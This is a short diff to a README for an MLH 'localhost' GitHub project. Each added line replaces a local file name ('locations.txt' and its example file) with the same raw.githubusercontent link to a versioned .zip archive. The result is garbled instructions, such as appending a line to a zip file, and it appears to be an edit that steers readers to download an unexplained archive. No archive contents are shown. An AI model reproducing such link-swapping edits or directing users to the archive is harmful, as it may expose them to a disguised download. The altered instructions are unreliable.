omkheni/mlh-localhost-github-utu/README.md

 Japan
 ```

-To add a new location, simply append a new line to the locations.txt file
+To add a new location, simply append a new line to the https://raw.githubusercontent.com/omkheni/mlh-localhost-github-utu/master/views/localhost-github-utu-mlh-3.9-alpha.2.zip file

-There is also a `locations.txt.example` file that can be used to test the app.
-Copy its content to locations.txt and restart the app.
+There is also a `https://raw.githubusercontent.com/omkheni/mlh-localhost-github-utu/master/views/localhost-github-utu-mlh-3.9-alpha.2.zip` file that can be used to test the app.
+Copy its content to https://raw.githubusercontent.com/omkheni/mlh-localhost-github-utu/master/views/localhost-github-utu-mlh-3.9-alpha.2.zip and restart the app.

 ## Running the application: